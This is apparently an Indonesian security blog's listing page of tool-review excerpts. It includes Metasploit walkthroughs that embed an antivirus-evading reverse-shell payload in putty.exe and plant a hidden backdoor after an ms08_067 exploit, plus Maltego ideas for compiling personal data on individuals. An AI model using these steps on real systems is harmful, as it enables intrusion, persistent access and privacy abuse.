Currently Browsing: Tools Review

.metasploit framework 3.3 released.

.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject- .beberapa perubahan dalam release kali ini: — 123 new exploits,117 auxiliary modules. — dukungan terhadap ruby 1.9.1. — performance dan stability lebih baik,peningkatan dalam proses startup framework. — terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi. — compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows. — dukungan untuk JSP payloads, IPV6, NX dan DEP. — meterpreter mendukung screenshot,keylogger, ataupun packet sniffing. — msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit. .for more info metasploit’s 3.3 release notes. .masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal. .berikut POC dari msfencode embedded to arbitry executables. [email protected]:/pentest/exploits/framework3$ ./msfconsole / / / (___ (___ ___ ___ ( ___ ___ | ) )| |___)|___ |___)| )|___)| ) |__/ _/ |__ |__ __/ | | |__ |// / =[ metasploit v3.4-dev [core:3.4 api:1.0] + -- --=[ 448 exploits - 216 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7564 updated today (2009.11.18) msf > version Framework: 3.4-dev.7554 Console : 3.4-dev.7537 ——————————————– [email protected]:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe [*] x86/shikata_ga_nai succeeded with size 102 (iteration=1) .hasil scan virustotal 2/41. .berikut merupakan hasil perbandingan metadata dari putty executable, [email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe ---- ExifTool ---- ExifTool Version Number : 7.89 ---- System ---- File Name : putty.exe Directory : /home/d0tz File Size : 444 kB File Modification Date/Time : 2009:11:08 22:36:28+07:00 ---- File ---- File Type : Win32 EXE MIME Type : application/octet-stream ---- EXE ---- Machine Type : Intel 386 or later, and compatibles Time Stamp : 2007:04:29 18:43:12+07:00 PE...
Read More of .metasploit framework 3.3 released.

Metasploit: Backdooring

Mungkin sebagian sudah ada yang tahu bahwa metasploit dapat digunakan untuk membuat backdoor, pernah juga disinggung pada toket edisi new year 2009. Penggunaan backdoor ini sangat berguna terutama sebagai post-exploitation method. Pada contoh kali ini kita akan memanfaatkan 2 metode dasar mendapatkan shell dari target, yaitu bind_tcp dan reverse_tcp. Untuk bind_tcp, backdoor akan dijalankan pada terget dimana target akan membuka port pada sistemnya sendiri. Sehingga setelah proses exploitasi selesai, kita dapat masuk kapan saja ke target dengan memanfaatkan port yang telah dibuka oleh backdoor tersebut. $ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 307 Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread Backdoor tersebut akan membuka port 4321 pada target 10.10.96.143. Bagaimana proses menjalankan backdoor tersebut terserah kita, bisa jadi backdoor ditanam dan dijalankan setelah proses exploitasi selesai terhadap target seperti berikut: msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English [*] Selected Target: Windows XP SP0/SP1 Universal [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780) meterpreter > cd meterpreter > pwd C: meterpreter > upload MicrosoftDS.exe [*] uploading : MicrosoftDS.exe -> MicrosoftDS.exe [*] uploaded : MicrosoftDS.exe -> MicrosoftDS.exe meterpreter > execute -f MicrosoftDS.exe -H Process 2348 created. Pada saat berikutnya, kita dapat masuk ke mesin target tanpa melakukan exploitasi ulang, cukup dengan membuka koneksi pada port yang telah didefinisikan berikutnya. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(handler) > set LPORT 4321 LPORT => 4321 msf exploit(handler) > set RHOST 10.10.96.143 RHOST => 10.10.96.143 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*]...
Read More of Metasploit: Backdooring

Again, Backtrack 4 Harddisk Installation

Seperti biasa, proses instalasi Backtrack sangat-sangat simple terutama bagi para pengguna Gentoo dimana tehnik chroot dan konfigurasi boot loader bukan lagi menjadi hal yang aneh. Instalasi backtrack 4 ke harddisk secara umum dapat dilihat pada forum remote-exploit, sebagai tambahan instalasi Backtrack 4 pada MacBook dapat dilihat pada link...
Read More of Again, Backtrack 4 Harddisk Installation

Maltego 2.0.2

Baru-baru ini paterva mengeluarkan rilis baru untuk maltego. Maltego sendiri pernah dibahas tahun lalu disini. Ada cukup banyak improvement yang dilakukan oleh team Roelof Tammingh dalam penyempurnaan Maltego. Pada awalnya maltego merupakan tools simple untuk mencari hubungan antar objek seperti yang dijelaskan pada blog kecoak sebelumnya. Namun saat ini sudah proses discovery tidak terbatas pada hal-hal infrastruktur saja, namun sudah meliputi pen-testing hingga malware discovery. Ambil contoh kita memasukan object services berupa apache port 80, dengan transform untuk penetration testing akan ditemukan berbagai informasi yang berkaitan dengan apache port 80 ini, misalnya: listing exploit. Untuk malware transform kita juga akan sering mendapatkan hal-hal menarik, misalnya visualisasi sudah sejauh mana suatu malware menginfeksi korbannya, gambaran target dari daerah mana saja, malware tersebut berasal dari mana saja, dsb. Hanya saja sayangnya beragam feature menarik tersebut tersedia pada commercial edition dimana kita harus mengeluarkan lebih dari $400 untuk licensenya. Tersedia community edition namun transform yang disediakan sangat terbatas, jadi jangan mengharapkan bisa melakukan discovery pen-testing jika hanya menggunakan community edition. Diantara feature-feature baru yang hadir di rilis Maltego 2.0.2 ada satu feature yang menurut saya pribadi sangat berguna, dan ini bisa diakses walaupun hanya menggunakan community edition, yaitu local transform. Pada situs maltego terdapat spesifikasi untuk membuat local transform, gampangnya adalah kita bisa membuat suatu private transform sendiri (mis: input berupa nama seseorang dan outputnya adalah data berdasarkan informasi penduduk di Indonesia) dan hasilnya di visualisasikan dengan menggunakan Maltego, ataupun di jointkan hasilnya dengan hasil transform lain untuk mendapatkan informasi yang lebih banyak (mis: dari input nama, dapat alamat rumah, dapat website yang dikunjungi apa saja, dapat informasi kepemilikan account, dsb). Pemanfaatan local transform menurut saya bisa jauh lebih ‘fun and profit’. Ambil contoh suatu kelompok berhasil masuk ke berbagai sistem dengan skill hackingnya, dan kelompok ini lebih tertarik untuk mengumpulkan beragam informasi yang dapat ditemukan pada sistem tersebut dibandingkan melakukan mass...
Read More of Maltego 2.0.2

Watchout for Backtrack4 and Pentoo

Untuk yang belum tahu, distro security dari remote-exploit yang sangat populer akan mengeluarkan rilis terbarunya. Sepertinya sekarang ini para white-hat memang sangat gemar sekali menjadikan ajang security conference sebagai media PR, atau produk security hasil research yang dijadikan alat PR suatu security conference?well, yang pasti berdasarkan muts backtrack4 beta akan dapat segera di download setelah shmoocon berakhir. In the other corner, pentoo, yang saat awal-awal distro security menjadi trend dikalangan security beberapa tahun lalu juga ikut menyumbangkan distro security berbasis Gentoo Linux, berencana untuk mengeluarkan rilis terbarunya dalam waktu dekat. Saya sendiri cukup kecewa karena pentoo tidak pernah terupdate lagi sejak rilis terakhirnya sekitar 2-3 tahun yang lalu, walaupun tidak sepopuler ataupun sematang backtrack namun kehadiran pentoo menjadi favorite tersendiri terutama bagi para pecinta gentoo. Let see feature-feature baru apa saja yang muncul di distro-distro terbaru ini, feature GPU cracking sepertinya cukup membuat penasaran 🙂 UPDATE: download versi alpha pentoo disini. Dilihat sekilas, tidak banyak perbedaan dengan Backtrack versi lama, cukup kecewa dengan penanganan resolusi layarnya di MacBook via VMware...
Read More of Watchout for Backtrack4 and Pentoo

Introduction to Load Balancing with HAPROXY

Load balancing (LB) adalah salah satu technology yang udah cukup lama, namun tidak cukup familiar di kalangan IT itu sendiri,padahal hampir sebagian besar site-site yang memiliki traffic tingkat tinggi pasti menggunakan teknologi LB untuk membagi beban ke server atau cluster yang mereka miliki. berikut ini adalah contohnya: %host -t a www.detik.com www.detik.com is an alias for detik.com. detik.com has address 202.158.66.94 detik.com has address 203.190.241.41 detik.com has address 203.190.241.43 detik.com has address 202.158.66.190 detik.com has address 202.158.66.86 detik.com has address 203.190.241.166 detik.com has address 202.158.66.20 %host -t a www.google.co.id www.google.co.id is an alias for www.google.com. www.google.com is an alias for www.l.google.com. www.l.google.com has address 66.249.89.104 www.l.google.com has address 66.249.89.147 www.l.google.com has address 66.249.89.99 Okey, 2 contoh diatas cukup memberi gambaran bahwa kedua site tersebut menggunakan teknologi balancing. Untuk definisi LB itu sendiri bisa dibaca disini. LB memiliki beberapa algoritma atau metode dalam membagi beban ke server atau cluster yang mereka miliki: 1. DNS Load Balancing Metode ini menggunkan sebuah domain name yang menunjuk ke-beberapa IP publik sekaligus, silahkan baca disini untuk keterangan lebih lanjut 2. Random Allocation Ini adalah algoritma random, tidak ada yang perlu dijelaskan lebih lanjut, karena algoritma ini membagi beban ke server secara random tanpa ada sebuah pola yang jelas. 3. Round Robin Round robin membagi incoming request secara rotasi, jadi misalkan ada 3 server yang menjadi anggota dari sebuah cluster, ketika ada request pertama, maka server A yang akan menghadle-nya, request kedua Server B, request ketiga server C. Kemudian ketika ada request ke-4 maka itu akan dirotasi lagi ke server A kemudian request ke-lima akan diberikan ke server B, begitu seterusnya. selengkapnya bisa anda baca disini 4. Weighted Round-Robin Allocation Algoritma ini adalah pengembangan dari algoritma round robin, sedikit perbedaannya adalah algoritma ini bisa membagi beban lebih tinggi ke server atau cluster yang memiliki resource yang lebih besar Ada banyak aplikasi maupun hardware yang bisa...
Read More of Introduction to Load Balancing with HAPROXY

Dtrace on FreeBSD

Proses tracing adalah salah satu bagian penting dari task seorang administrator sistem, melihat proses yang sedang berjalan, idle atau yang lainnya akan sangat membantu dalam proses pengaturan sistem itu sendiri. Banyak tools tracing yang tersedia, seperti ktrace, strace dan yang lainnya. Salah satu yang cukup powerfull bagi penulis adalah dtrace. Dtrace adalah sebuah tools yang datang dengan berbagai fungsi dan kegunaan yang sangat membantu proses tracing yang dibuat oleh SUN dan menjadi bagian dari sistem operasi SunOS maupun OpenSolaris. Salah satu feature yang sangat menarik dari dtrace adalah penggunaan D language sebagia scripting language buat dtrace itu sendiri. FreeBSD sebagai salah satu sistem “Unix like” ikut memanfaatkan penggunaan dtrace sebagai salah satu tracing tool. Bagi para pengguna sistem ini, perlu sedikit modifikasi terhadap kernel, apabila ingin menggunakannya. Berikut langkah-langkah penggunaan dtrace di dalam sistem FreeBSD: Pada langkah pertama saya menambahkan beberapa options untuk penggunaan dtrace, kemudian melakukan compile ulang pada kernel FreeBSD saya dengan option WITH_CTF (C Type Format). k-elektronik# uname -sr FreeBSD 7.1-RELEASE-p2 k-elektronik# cd /usr/src/sys/i386/conf/ k-elektronik# tail -n 2 K-Elektronik options         KDTRACE_HOOKS options         DDB_CTF k-elektronik# cd /usr/src/ k-elektronik# make WITH_CTF=1 buildkernel KERNCONF=K-Elektronik k-elektronik# make WITH_CTF=1 installkernel KERCONF=K-Elektronik k-elektronik# reboot Langkah kedua, saya meload module dtraceall ke-dalam kernel FreeBSD, jika ingin melakukan secara otomatis setiap kali ketika sistem boot, edit file /boot/loader.conf. k-elektronik# kldload dtraceall k-elektronik# kldstat Id Refs Address    Size     Name 1   12 0xc0400000 990bb8   kernel 2    1 0xc0d91000 20d8     dtraceall.ko 3    4 0xc0d94000 3f98     cyclic.ko 4    9 0xc0d98000 23cc     opensolaris.ko 5    7 0xc0d9b000 ba188    dtrace.ko 6    2 0xc0e56000 26d8     dtmalloc.ko 7    2 0xc0e59000 456c     fbt.ko 8    2 0xc0e5e000 2788     sdt.ko 9    2 0xc0e61000 e340     systrace.ko 10    2 0xc0e70000 33b0     profile.ko 11    1 0xc0e74000 6a2c4    acpi.ko k-elektronik# cat /boot/loader.conf dtraceall_load="YES" Seperti terlihat diatas, module dtrace telah di load oleh kernel, untuk mencobanya, buat script sederhana seperti dibawah ini: k-elektronik# cat counter.d dtrace:::BEGIN { i = 10; }...
Read More of Dtrace on FreeBSD

WMAP: Metasploit + RatProxy + SQlite3

Mungkin masih ada yang belum tahu bahwa metasploit saat ini mendukung cukup banyak feature, salah satunya adalah wmap. WMAP merupakan web application framework yang digunakan untuk proses scanning suatu website dengan memanfaatkan metasploit framework. WMAP sendiri masih terbilang baru sehingga masih banyak hal-hal yang belum ditambahkan, proses scanning pun masih dilakukan dengan cara sederhana namun konsepnya cukup baik sehingga kita dapat ikut melakukan kustomisasi terhadap modul-moudul yang akan digunakan. Dokumentasi mengenai WMAP dapat ditemukan pada paket Metasploit, atau bisa dilihat langsung secara online disini. Dan seperti biasa, kita akan mulai pembahasan dari konsep hingga implementasi. Bagi kalian yang terbiasa melakukan audit ataupun scanning terhadap suatu aplikasi web pasti sudah terbiasa dengan istilah spider. Web scanner umumnya memiliki kemampuan untuk mengumpulkan informasi sebanyak-banyaknya dari target melalui seluruh link yang ditemukan mulai dari halaman index hingga halaman-halaman terdalam lainnya. Web scanner tersebut akan melakukan audit terhadap link-link yang ditemukan dan dicocokan hasilnya dengan informasi vulnerability dalam database tools tersebut. WMAP pada metasploit bekerja dengan metode yang mirip namun memanfaatkan aplikasi-aplikasi opensource. WMAP merupakan salah satu plugin (yup, salah satu, masih ada beberapa plugin lainnya) metasploit yang dapat di load pada msfconsole dimana melalui msfconsole tersebut user dapat berinteraksi dengan metasploit framework. Berikut ini konsep WMAP pada metasploit: 1. RatProxy Metasploit memanfaatkan RatProxy sebagai proxy yang akan menangkap seluruh data request-response antara web client dengan web server. Informasi tersebut akan dimasukan ke suatu database (sqlite3) untuk kemudian digunakan oleh modul-modul WMAP. RatProxy sendiri merupakan hasil karya hacker Michal Zalewski yang merupakan opensource tools untuk audit web application. RatProxy tidak memiliki dukungan terhadap penyimpanan data kedalam bentuk database, oleh karena itu sebelum dapat digunakan oleh WMAP maka RatProxy harus di-patch terlebih dahulu. Patch bisa didapatkan dari bundle metasploit: external/ratproxy/ratproxy_wmap.diff 2. SQLite3 SQLite merupakan produk database yang diklaim small, fast, reliable. SQLite umumnya digunakan oleh aplikasi-aplikasi yang membutuhkan database sebagai tempat penyimpanan dan pemrosesan...
Read More of WMAP: Metasploit + RatProxy + SQlite3

Goolag Scanner

—–FOR IMMEDIATE RELEASESECURITY ADVISORY: The following program may screw a large Internet searchengine and make the Web a safer place. LUBBOCK, TX, February 20th — Today CULT OF THE DEAD COW (cDc), the world’s most attractive hacker group, announced the release of Goolag Scanner, a web auditing tool. Goolag Scanner enables everyone to audit his or her own web site via Google. The scanner technology is based on “Google hacking,” a form of vulnerability research developed by Johnny I Hack Stuff. He’s a lovely fellow. Go buy him a drink. “It’s no big secret that the Web is the platform,” said cDc spokesmodel Oxblood Ruffin. “And this platform pretty much sucks from a security perspective. Goolag Scanner provides one more tool for web site owners to patch up their online properties. We’ve seen some pretty scary holes through random tests with the scanner in North America, Europe, and the Middle East. If I were a government, a large corporation, or anyone with a large web site, I’d be downloading this beast and aiming it at my site yesterday. The v ulnerabilities are that serious.” Goolag Scanner will be released open source under the GNU Affero General Public license. It is dedicated to the memory of Wau Holland, founder of the Chaos Computer Club, and a true champion of privacy rights and social justice. GOOLAG SCANNER FUNCTIONS AND FEATURES Goolag Scanner is a standalone windows GUI based application. It uses one xml-based configuration file for its settings. All dorks coming with the distribution of gS are kept inside one file. — Press Contact Oxblood Ruffin oxblood at hacktivismo.com Saya merasakan tools ini sangat membantu, terutama karena saya sangat malas menghafal jenis-jenis dork :-P. Get it from...
Read More of Goolag Scanner

Maltego

Maltego merupakan toos inovatif yang ditujukan untuk proses information gathering. Proses information gathering yang awalnya menggunakan cara klasik seperti domain-whois, search-engine, archive, dsb sekarang dapat dilakukan secara otomatis. Maltego memiliki metode spesifikasi tersendiri untuk proses information gathering yang didalamnya sudah melibatkan metode-metode klasik yang umum digunakan sebelumnya. Maltego menggunakan metode ‘keterkaitan’ antara beberapa objek. Objek tersebut terdiri dari Domain, IP Address, DNS Name, Website, e-mail, Location, Person, dsb. Yang dilakukan maltego adalah menggambarkan hubungan keterkaitan antar objek yang akan dicari. Proses penggambaran hubungan tersebut dilakukan oleh suatu metode (plugin) yang disebut transform. Transform akan mencari objek lain yang memiliki hubungan dengan objek yang dicari serta menggambarkan hubungan tersebut dalam suatu bentuk grafik. Misalnya: akan dicari segala hal yang berhubungan dengan suatu domain kilkbca.com, maka klikbca.com merupakan objek awal pencarian. Transform akan mencari objek lain yang berhubungan dengan objek klikbca.com, misalnya: mencari objek IP Address klikbca.com, IP Netblock yang dimiliki oleh klikbca.com, website yang dimiliki oleh klikbca.com, mx records yang berhubungan dengan klikbca.com, mencari person yang berhubungan dengan klikbca.com. Dari semua hasil transform objek tersebut, kita juga dapat mencari objek lainnya. Misal: dari person hasil transform domain klikbca.com dapat dicari social network apa saja yang diikuti oleh person tersebut, alamat email person tersebut, person tersebut terkait dengan website apa saja, dsb. Dengan melihat kemampuan maltego, maka proses information gathering akan semakin mudah dilakukan bahkan oleh orang awam sekalipun. Dan kita dapat mencari titik lemah mana yang dapat digunakan untuk menusuk masuk ke dalam suatu target. Transform (plugin mengubah dari DNS -> IP Address, DNS -> MX Record, E-Mail -> Social Network (Friendster)) juga dapat dikembangkan sendiri oleh user. Maltego memberikan draft spesifikasi yang dapat digunakan untuk mengembangkan jenis transform tertentu sesuai keinginan kita, dan bahkan kita juga bisa membatasi siapa saja yang dapat menggunakan transform milik kita tersebut dengan suatu API key. Maltego bisa kalian dapatkan dari situs resminya, dan...
Read More of Maltego